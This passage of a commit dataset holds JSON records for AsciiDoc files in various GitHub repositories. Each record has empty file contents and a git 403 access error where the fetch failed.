ezirus\/elasticsearch,golubev\/elasticsearch,iacdingping\/elasticsearch,queirozfcom\/elasticsearch,rento19962\/elasticsearch,kaneshin\/elasticsearch,areek\/elasticsearch,overcome\/elasticsearch,sposam\/elasticsearch,jw0201\/elastic,LeoYao\/elasticsearch,pritishppai\/elasticsearch,gmarz\/elasticsearch,Charlesdong\/elasticsearch,lydonchandra\/elasticsearch,sjohnr\/elasticsearch,koxa29\/elasticsearch,andrestc\/elasticsearch,mapr\/elasticsearch,jbertouch\/elasticsearch,xingguang2013\/elasticsearch,btiernay\/elasticsearch,mcku\/elasticsearch,s1monw\/elasticsearch,vingupta3\/elasticsearch,infusionsoft\/elasticsearch,Fsero\/elasticsearch,humandb\/elasticsearch,wbowling\/elasticsearch,avikurapati\/elasticsearch,GlenRSmith\/elasticsearch,YosuaMichael\/elasticsearch,clintongormley\/elasticsearch,mjason3\/elasticsearch,qwerty4030\/elasticsearch,jw0201\/elastic,loconsolutions\/elasticsearch,huanzhong\/elasticsearch,sauravmondallive\/elasticsearch,rento19962\/elasticsearch,Charlesdong\/elasticsearch,MjAbuz\/elasticsearch,jsgao0\/elasticsearch,petabytedata\/elasticsearch,fooljohnny\/elasticsearch,djschny\/elasticsearch,linglaiyao1314\/elasticsearch,glefloch\/elasticsearch,kunallimaye\/elasticsearch,dataduke\/elasticsearch,pablocastro\/elasticsearch,jimczi\/elasticsearch,Collaborne\/elasticsearch,markwalkom\/elasticsearch,cwurm\/elasticsearch,mapr\/elasticsearch,vietlq\/elasticsearch,mapr\/elasticsearch,i-am-Nathan\/elasticsearch,dpursehouse\/elasticsearch,sneivandt\/elasticsearch,rhoml\/elasticsearch,szroland\/elasticsearch,mjhennig\/elasticsearch,wangtuo\/elasticsearch,sauravmondallive\/elasticsearch,schonfeld\/elasticsearch,vroyer\/elasticassandra,hechunwen\/elasticsearch,golubev\/elasticsearch,Clairebi\/ElasticsearchClone,dantuffery\/elasticsearch,xpandan\/elasticsearch,dpursehouse\/elasticsearch,strapdata\/elassandra-test,mrorii\/elasticsearch,geidies\/elasticsea
rch,YosuaMichael\/elasticsearch,alexbrasetvik\/elasticsearch,zhiqinghuang\/elasticsearch,jpountz\/elasticsearch,nellicus\/elasticsearch,AshishThakur\/elasticsearch,lydonchandra\/elasticsearch,Rygbee\/elasticsearch,sneivandt\/elasticsearch,xpandan\/elasticsearch,caengcjd\/elasticsearch,Shekharrajak\/elasticsearch,palecur\/elasticsearch,karthikjaps\/elasticsearch,masaruh\/elasticsearch,masaruh\/elasticsearch,Ansh90\/elasticsearch,lchennup\/elasticsearch,queirozfcom\/elasticsearch,apepper\/elasticsearch,wbowling\/elasticsearch,martinstuga\/elasticsearch,easonC\/elasticsearch,caengcjd\/elasticsearch,iacdingping\/elasticsearch,iamjakob\/elasticsearch,henakamaMSFT\/elasticsearch,18098924759\/elasticsearch,coding0011\/elasticsearch,drewr\/elasticsearch,huypx1292\/elasticsearch,huanzhong\/elasticsearch,Kakakakakku\/elasticsearch,nomoa\/elasticsearch,winstonewert\/elasticsearch,Collaborne\/elasticsearch,huypx1292\/elasticsearch,mnylen\/elasticsearch,JervyShi\/elasticsearch,MichaelLiZhou\/elasticsearch,huanzhong\/elasticsearch,beiske\/elasticsearch,dongjoon-hyun\/elasticsearch,IanvsPoplicola\/elasticsearch,naveenhooda2000\/elasticsearch,sauravmondallive\/elasticsearch,dantuffery\/elasticsearch,lchennup\/elasticsearch,Shepard1212\/elasticsearch,hirdesh2008\/elasticsearch,adrianbk\/elasticsearch,tebriel\/elasticsearch,combinatorist\/elasticsearch,LewayneNaidoo\/elasticsearch,Fsero\/elasticsearch,Shepard1212\/elasticsearch,thecocce\/elasticsearch,jeteve\/elasticsearch,franklanganke\/elasticsearch,alexshadow007\/elasticsearch,markharwood\/elasticsearch,likaiwalkman\/elasticsearch,KimTaehee\/elasticsearch,ajhalani\/elasticsearch,aglne\/elasticsearch,jw0201\/elastic,palecur\/elasticsearch,tebriel\/elasticsearch,jimczi\/elasticsearch,fred84\/elasticsearch,Shekharrajak\/elasticsearch,lmtwga\/elasticsearch,Kakakakakku\/elasticsearch,yongminxia\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,MichaelLiZhou\/elasticsearch,Asimov4\/elasticsearch,sdauletau\/elasticsearch,Uiho\/elasticsearch,mgalushka\/elasticsearch,sposam\/elasticsearch,clintongormley\/elasticsearch,rhoml\/elasticsearch,SergVro\/elasticsearch,chrismwendt\/elasticsearch,rhoml\/elasticsearch,zeroctu\/elasticsearch,ouyangkongtong\/elasticsearch,queirozfcom\/elasticsearch,scottsom\/elasticsearch,luiseduardohdbackup\/elasticsearch,abibell\/elasticsearch,Brijeshrpatel9\/elasticsearch,mgalushka\/elasticsearch,mrorii\/elasticsearch,petabytedata\/elasticsearch,sarwarbhuiyan\/elasticsearch,JackyMai\/elasticsearch,Clairebi\/ElasticsearchClone,acchen97\/elasticsearch,ckclark\/elasticsearch,mcku\/elasticsearch,linglaiyao1314\/elasticsearch,rajanm\/elasticsearch,Uiho\/elasticsearch,hirdesh2008\/elasticsearch,a2lin\/elasticsearch,mm0\/elasticsearch,strapdata\/elassandra-test,AndreKR\/elasticsearch,koxa29\/elasticsearch,a2lin\/elasticsearch,tkssharma\/elasticsearch,Brijeshrpatel9\/elasticsearch,lchennup\/elasticsearch,umeshdangat\/elasticsearch,hafkensite\/elasticsearch,andrejserafim\/elasticsearch,diendt\/elasticsearch,a2lin\/elasticsearch,andrejserafim\/elasticsearch,awislowski\/elasticsearch,slavau\/elasticsearch,ricardocerq\/elasticsearch,slavau\/elasticsearch,fforbeck\/elasticsearch,dataduke\/elasticsearch,EasonYi\/elasticsearch,vingupta3\/elasticsearch,trangvh\/elasticsearch,beiske\/elasticsearch,NBSW\/elasticsearch,humandb\/elasticsearch,masaruh\/elasticsearch,markharwood\/elasticsearch,chrismwendt\/elasticsearch,palecur\/elasticsearch,AndreKR\/elasticsearch,heng4fun\/elasticsearch,MisterAndersen\/elasticsearch,rajanm\/elasticsearch,vietlq\/elasticsea
rch,andrestc\/elasticsearch,mgalushka\/elasticsearch,tsohil\/elasticsearch,mjason3\/elasticsearch,C-Bish\/elasticsearch,ydsakyclguozi\/elasticsearch,boliza\/elasticsearch,spiegela\/elasticsearch,Liziyao\/elasticsearch,davidvgalbraith\/elasticsearch,MjAbuz\/elasticsearch,janmejay\/elasticsearch,ivansun1010\/elasticsearch,mcku\/elasticsearch,Collaborne\/elasticsearch,Stacey-Gammon\/elasticsearch,Brijeshrpatel9\/elasticsearch,mrorii\/elasticsearch,franklanganke\/elasticsearch,adrianbk\/elasticsearch,i-am-Nathan\/elasticsearch,phani546\/elasticsearch,episerver\/elasticsearch,milodky\/elasticsearch,masterweb121\/elasticsearch,kimimj\/elasticsearch,i-am-Nathan\/elasticsearch,alexkuk\/elasticsearch,sdauletau\/elasticsearch,wimvds\/elasticsearch,vrkansagara\/elasticsearch,amaliujia\/elasticsearch,kalimatas\/elasticsearch,codebunt\/elasticsearch,feiqitian\/elasticsearch,yynil\/elasticsearch,kenshin233\/elasticsearch,fekaputra\/elasticsearch,ckclark\/elasticsearch,jprante\/elasticsearch,Microsoft\/elasticsearch,cwurm\/elasticsearch,nrkkalyan\/elasticsearch,wbowling\/elasticsearch,apepper\/elasticsearch,naveenhooda2000\/elasticsearch,18098924759\/elasticsearch,socialrank\/elasticsearch,ImpressTV\/elasticsearch,wayeast\/elasticsearch,springning\/elasticsearch,djschny\/elasticsearch,mm0\/elasticsearch,hanst\/elasticsearch,queirozfcom\/elasticsearch,pranavraman\/elasticsearch,Clairebi\/ElasticsearchClone,combinatorist\/elasticsearch,sarwarbhuiyan\/elasticsearch,camilojd\/elasticsearch,JervyShi\/elasticsearch,peschlowp\/elasticsearch,Stacey-Gammon\/elasticsearch,feiqitian\/elasticsearch,mbrukman\/elasticsearch,markllama\/elasticsearch,anti-social\/elasticsearch,Siddartha07\/elasticsearch,wittyameta\/elasticsearch,kunallimaye\/elasticsearch,myelin\/elasticsearch,tsohil\/elasticsearch,ricardocerq\/elasticsearch,rento19962\/elasticsearch,alexkuk\/elasticsearch,EasonYi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,petmit\/elasticsearch,luiseduardohdbackup\/elasticsearch,scottsom\/elasticsearch,lmtwga\/elasticsearch,luiseduardohdbackup\/elasticsearch,SergVro\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,infusionsoft\/elasticsearch,snikch\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,feiqitian\/elasticsearch,achow\/elasticsearch,girirajsharma\/elasticsearch,NBSW\/elasticsearch,jpountz\/elasticsearch,micpalmia\/elasticsearch,mgalushka\/elasticsearch,EasonYi\/elasticsearch,elancom\/elasticsearch,areek\/elasticsearch,snikch\/elasticsearch,codebunt\/elasticsearch,hanswang\/elasticsearch,NBSW\/elasticsearch,markharwood\/elasticsearch,Rygbee\/elasticsearch,petabytedata\/elasticsearch,ImpressTV\/elasticsearch,sarwarbhuiyan\/elasticsearch,pozhidaevak\/elasticsearch,javachengwc\/elasticsearch,Liziyao\/elasticsearch,F0lha\/elasticsearch,sjohnr\/elasticsearch,jbertouch\/elasticsearch,andrejserafim\/elasticsearch,Rygbee\/elasticsearch,mute\/elasticsearch,knight1128\/elasticsearch,ImpressTV\/elasticsearch,Flipkart\/elasticsearch,wenpos\/elasticsearch,yuy168\/elasticsearch,obourgain\/elasticsearch,golubev\/elasticsearch,amit-shar\/elasticsearch,fekaputra\/elasticsearch,trangvh\/elasticsearch,nazarewk\/elasticsearch,kalburgimanjunath\/elasticsearch,areek\/elasticsearch,ajhalani\/elasticsearch,combinatorist\/elasticsearch,Microsoft\/elasticsearch,fekaputra\/elasticsearch,amit-shar\/elasticsearch,TonyChai24\/ESSource,sposam\/elasticsearch,slavau\/elasticsearch,coding0011\/elasticsearch,strapdata\/elassandra,MetSystem\/elasticsearch,franklanganke\/elasticsearch,ckclark\/elasticsearch,beiske\/elasticsearch,mbrukma
n\/elasticsearch,nilabhsagar\/elasticsearch,rento19962\/elasticsearch,rajanm\/elasticsearch,alexbrasetvik\/elasticsearch,sneivandt\/elasticsearch,jango2015\/elasticsearch,mrorii\/elasticsearch,dylan8902\/elasticsearch,tahaemin\/elasticsearch,Fsero\/elasticsearch,lks21c\/elasticsearch,sc0ttkclark\/elasticsearch,GlenRSmith\/elasticsearch,Shekharrajak\/elasticsearch,mikemccand\/elasticsearch,ckclark\/elasticsearch,lzo\/elasticsearch-1,nazarewk\/elasticsearch,kalburgimanjunath\/elasticsearch,alexkuk\/elasticsearch,janmejay\/elasticsearch,gmarz\/elasticsearch,scottsom\/elasticsearch,ouyangkongtong\/elasticsearch,jprante\/elasticsearch,strapdata\/elassandra5-rc,schonfeld\/elasticsearch,golubev\/elasticsearch,jprante\/elasticsearch,masterweb121\/elasticsearch,zhiqinghuang\/elasticsearch,mcku\/elasticsearch,markllama\/elasticsearch,alexkuk\/elasticsearch,onegambler\/elasticsearch,tcucchietti\/elasticsearch,jsgao0\/elasticsearch,sarwarbhuiyan\/elasticsearch,lzo\/elasticsearch-1,sdauletau\/elasticsearch,strapdata\/elassandra-test,truemped\/elasticsearch,truemped\/elasticsearch,jimczi\/elasticsearch,ouyangkongtong\/elasticsearch,cnfire\/elasticsearch-1,cnfire\/elasticsearch-1,mkis-\/elasticsearch,abibell\/elasticsearch,Stacey-Gammon\/elasticsearch,socialrank\/elasticsearch,kenshin233\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,SergVro\/elasticsearch,i-am-Nathan\/elasticsearch,strapdata\/elassandra-test,zhiqinghuang\/elasticsearch,JSCooke\/elasticsearch,awislowski\/elasticsearch,KimTaehee\/elasticsearch,hanswang\/elasticsearch,geidies\/elasticsearch,sscarduzio\/elasticsearch,F0lha\/elasticsearch,phani546\/elasticsearch,markwalkom\/elasticsearch,jeteve\/elasticsearch,szroland\/elasticsearch,jbertouch\/elasticsearch,achow\/elasticsearch,nezirus\/elasticsearch,kubum\/elasticsearch,Uiho\/elasticsearch,Shepard1212\/elasticsearch,dataduke\/elasticsearch,elancom\/elasticsearch,xingguang2013\/elasticsearch,snikch\/elasticsearch,kcompher\/elasticsearch,huypx1292\/elasticsearch,Shekharrajak\/elasticsearch,btiernay\/elasticsearch,girirajsharma\/elasticsearch,beiske\/elasticsearch,pablocastro\/elasticsearch,wbowling\/elasticsearch,dylan8902\/elasticsearch,anti-social\/elasticsearch,geidies\/elasticsearch,hirdesh2008\/elasticsearch,heng4fun\/elasticsearch,mohit\/elasticsearch,mute\/elasticsearch,coding0011\/elasticsearch,markwalkom\/elasticsearch,tahaemin\/elasticsearch,dylan8902\/elasticsearch,lchennup\/elasticsearch,mnylen\/elasticsearch,andrestc\/elasticsearch,beiske\/elasticsearch,likaiwalkman\/elasticsearch,rlugojr\/elasticsearch,tcucchietti\/elasticsearch,shreejay\/elasticsearch,myelin\/elasticsearch,schonfeld\/elasticsearch,khiraiwa\/elasticsearch,boliza\/elasticsearch,janmejay\/elasticsearch,kubum\/elasticsearch,ThalaivaStars\/OrgRepo1,apepper\/elasticsearch,jpountz\/elasticsearch,djschny\/elasticsearch,fooljohnny\/elasticsearch,ThalaivaStars\/OrgRepo1,ThiagoGarciaAlves\/elasticsearch,ThalaivaStars\/OrgRepo1,ckclark\/elasticsearch,pozhidaevak\/elasticsearch,StefanGor\/elasticsearch,aglne\/elasticsearch,zeroctu\/elasticsearch,aglne\/elasticsearch,umeshdangat\/elasticsearch,infusionsoft\/elasticsearch,hechunwen\/elasticsearch,ivansun1010\/elasticsearch,likaiwalkman\/elasticsearch,GlenRSmith\/elasticsearch,ThalaivaStars\/OrgRepo1,StefanGor\/elasticsearch,rhoml\/elasticsearch,milodky\/elasticsearch,humandb\/elasticsearch,Siddartha07\/elasticsearch,xuzha\/elasticsearch,mm0\/elasticsearch,kenshin233\/elasticsearch,wayeast\/elasticsearch,luiseduardohdbackup\/elasticsearch,wenpos\/elasticsearch,sdauletau\/
elasticsearch,kunallimaye\/elasticsearch,cnfire\/elasticsearch-1,zeroctu\/elasticsearch,abhijitiitr\/es,vvcephei\/elasticsearch,HarishAtGitHub\/elasticsearch,adrianbk\/elasticsearch,tebriel\/elasticsearch,Flipkart\/elasticsearch,fekaputra\/elasticsearch,milodky\/elasticsearch,himanshuag\/elasticsearch,tahaemin\/elasticsearch,JervyShi\/elasticsearch,mmaracic\/elasticsearch,lmtwga\/elasticsearch,Widen\/elasticsearch,yynil\/elasticsearch,gingerwizard\/elasticsearch,sreeramjayan\/elasticsearch,abibell\/elasticsearch,davidvgalbraith\/elasticsearch,vroyer\/elassandra,wuranbo\/elasticsearch,areek\/elasticsearch,jpountz\/elasticsearch,Charlesdong\/elasticsearch,polyfractal\/elasticsearch,codebunt\/elasticsearch,kaneshin\/elasticsearch,tcucchietti\/elasticsearch,tsohil\/elasticsearch,njlawton\/elasticsearch,franklanganke\/elasticsearch,18098924759\/elasticsearch,hydro2k\/elasticsearch,achow\/elasticsearch,xuzha\/elasticsearch,petmit\/elasticsearch,dongjoon-hyun\/elasticsearch,smflorentino\/elasticsearch,nknize\/elasticsearch,PhaedrusTheGreek\/elasticsearch,smflorentino\/elasticsearch,thecocce\/elasticsearch,weipinghe\/elasticsearch,amit-shar\/elasticsearch,slavau\/elasticsearch,uschindler\/elasticsearch,khiraiwa\/elasticsearch,hirdesh2008\/elasticsearch,PhaedrusTheGreek\/elasticsearch,scorpionvicky\/elasticsearch,F0lha\/elasticsearch,sscarduzio\/elasticsearch,hanst\/elasticsearch,zhiqinghuang\/elasticsearch,AleksKochev\/elasticsearch,KimTaehee\/elasticsearch,ouyangkongtong\/elasticsearch,kevinkluge\/elasticsearch,jaynblue\/elasticsearch,kimimj\/elasticsearch,mohit\/elasticsearch,a2lin\/elasticsearch,huypx1292\/elasticsearch,abibell\/elasticsearch,MaineC\/elasticsearch,schonfeld\/elasticsearch,amit-shar\/elasticsearch,elancom\/elasticsearch,mute\/elasticsearch,kcompher\/elasticsearch,Rygbee\/elasticsearch,vietlq\/elasticsearch,bestwpw\/elasticsearch,wittyameta\/elasticsearch,HonzaKral\/elasticsearch,cwurm\/elasticsearch,xingguang2013\/elasticsearch,yynil\/elasticsearch,mjhennig\/elasticsearch,Kakakakakku\/elasticsearch,kaneshin\/elasticsearch,yongminxia\/elasticsearch,liweinan0423\/elasticsearch,NBSW\/elasticsearch,btiernay\/elasticsearch,chirilo\/elasticsearch,F0lha\/elasticsearch,Helen-Zhao\/elasticsearch,gmarz\/elasticsearch,mnylen\/elasticsearch,geidies\/elasticsearch,brandonkearby\/elasticsearch,djschny\/elasticsearch,mjhennig\/elasticsearch,MjAbuz\/elasticsearch,nazarewk\/elasticsearch,abhijitiitr\/es,masterweb121\/elasticsearch,PhaedrusTheGreek\/elasticsearch,scorpionvicky\/elasticsearch,karthikjaps\/elasticsearch,alexshadow007\/elasticsearch,markllama\/elasticsearch,tcucchietti\/elasticsearch","old_file":"docs\/reference\/mapping\/fields\/timestamp-field.asciidoc","new_file":"docs\/reference\/mapping\/fields\/timestamp-field.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a77dddd54ff850db8c8347b23e9a06ddd8e64380","subject":"Update 2016-12-17-Vegan-Olive-Oil-Sea-Salt-Brownie-Cookies.adoc","message":"Update 
2016-12-17-Vegan-Olive-Oil-Sea-Salt-Brownie-Cookies.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2016-12-17-Vegan-Olive-Oil-Sea-Salt-Brownie-Cookies.adoc","new_file":"_posts\/2016-12-17-Vegan-Olive-Oil-Sea-Salt-Brownie-Cookies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zestyroxy\/zestyroxy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3393dda9df5806f8e64ec67144278a0244325dd","subject":"Update 2017-02-07-Best-practices-for-docker-compose-Part-1.adoc","message":"Update 2017-02-07-Best-practices-for-docker-compose-Part-1.adoc","repos":"MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io","old_file":"_posts\/2017-02-07-Best-practices-for-docker-compose-Part-1.adoc","new_file":"_posts\/2017-02-07-Best-practices-for-docker-compose-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MartinAhrer\/martinahrer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"feb577f8322761b6e69189464ed9197b2dd1b3e7","subject":"Update 2017-10-08-Draft-Using-MATLAB-for-real-time-control.adoc","message":"Update 2017-10-08-Draft-Using-MATLAB-for-real-time-control.adoc","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2017-10-08-Draft-Using-MATLAB-for-real-time-control.adoc","new_file":"_posts\/2017-10-08-Draft-Using-MATLAB-for-real-time-control.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c23ddb38a9494503b824bd68c5c40bbe4ea89881","subject":"Adds news\/2016-06-07-forge-3.2.2.final.asciidoc","message":"Adds news\/2016-06-07-forge-3.2.2.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-06-07-forge-3.2.2.final.asciidoc","new_file":"news\/2016-06-07-forge-3.2.2.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d346277582c72e5935edea8e4c814bcbde248e1a","subject":"Updated links","message":"Updated links\n","repos":"wybczu\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines","old_file":"docs\/JENKINS.adoc","new_file":"docs\/JENKINS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"81e23de67d43382d5fbbe9fcd8bd293f5dbd9970","subject":"Update 2015-07-09-Java-EE-7-and-WebSocket-API-for-Java-JSR-356-with-AngularJS-on-WildFly.adoc","message":"Update 
2015-07-09-Java-EE-7-and-WebSocket-API-for-Java-JSR-356-with-AngularJS-on-WildFly.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-07-09-Java-EE-7-and-WebSocket-API-for-Java-JSR-356-with-AngularJS-on-WildFly.adoc","new_file":"_posts\/2015-07-09-Java-EE-7-and-WebSocket-API-for-Java-JSR-356-with-AngularJS-on-WildFly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af6d9ef890ac50f5781ed12200395a9f4f433d2e","subject":"y2b create post BenQ Joybee GP2 iPhone \\\/ iPod Projector","message":"y2b create post BenQ Joybee GP2 iPhone \\\/ iPod Projector","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-03-BenQ-Joybee-GP2-iPhone--iPod-Projector.adoc","new_file":"_posts\/2011-12-03-BenQ-Joybee-GP2-iPhone--iPod-Projector.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2aa61f435ce3c6195f4f56de350e96f440c245bf","subject":"Update 2016-07-08-Word-Press-3.adoc","message":"Update 2016-07-08-Word-Press-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b0bc9ca70339a8d4ee61939c0dacedde371fcc4","subject":"Update 2017-04-05-Pagine-nuove.adoc","message":"Update 2017-04-05-Pagine-nuove.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-05-Pagine-nuove.adoc","new_file":"_posts\/2017-04-05-Pagine-nuove.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"656962dd44c5194f9977e344be77fd169b4d77ad","subject":"Update 2017-05-27-Welcome-Back.adoc","message":"Update 2017-05-27-Welcome-Back.adoc","repos":"TRex22\/blog,TRex22\/blog,TRex22\/blog","old_file":"_posts\/2017-05-27-Welcome-Back.adoc","new_file":"_posts\/2017-05-27-Welcome-Back.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TRex22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4740fc0d22c02c1646734f8909aa77ea3bac8141","subject":"starting work on https:\/\/github.com\/arun-gupta\/kubernetes-aws-workshop\/issues\/69","message":"starting work on 
https:\/\/github.com\/arun-gupta\/kubernetes-aws-workshop\/issues\/69\n","repos":"arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,wombat\/kubernetes-aws-workshop","old_file":"helm\/readme.adoc","new_file":"helm\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dalbhanj\/kubernetes-aws-workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"222161f557d8fc634da54330e7122161bc91d45e","subject":"Update static-page-test.adoc","message":"Update static-page-test.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/static-page-test.adoc","new_file":"_posts\/static-page-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdc987d4e955cbcda7e3a739e51aa72f9b223e60","subject":"updated readme [skip ci]","message":"updated readme [skip ci]\n","repos":"S-Mach\/s_mach.codetools","old_file":"codetools-play_json\/README.asciidoc","new_file":"codetools-play_json\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/S-Mach\/s_mach.codetools.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f85297a560144d96480acc06c16d2c2ab57da8f4","subject":"Update 2016-6-28-PHPER-authority-control.adoc","message":"Update 2016-6-28-PHPER-authority-control.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-28-PHPER-authority-control.adoc","new_file":"_posts\/2016-6-28-PHPER-authority-control.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"448fcd6b4c06d94d4c40698fc73c883144041242","subject":"Update 2015-12-29-MSVC2015-on-Debian-with-Wine-and-Maiken.adoc","message":"Update 2015-12-29-MSVC2015-on-Debian-with-Wine-and-Maiken.adoc","repos":"Dekken\/dekken.github.io,Dekken\/dekken.github.io,Dekken\/dekken.github.io","old_file":"_posts\/2015-12-29-MSVC2015-on-Debian-with-Wine-and-Maiken.adoc","new_file":"_posts\/2015-12-29-MSVC2015-on-Debian-with-Wine-and-Maiken.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Dekken\/dekken.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f398a3b0443649dcff19282380517ccd8e0d9336","subject":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","message":"Update 
2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d828b7f66df0c8064e86d61b25cbe858e3ebdc3","subject":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","message":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b19beb9b6c22aff4c18ba338805eba189ed0ab9","subject":"Publish 2016-6-27-file-getput-content.adoc","message":"Publish 2016-6-27-file-getput-content.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-file-getput-content.adoc","new_file":"2016-6-27-file-getput-content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 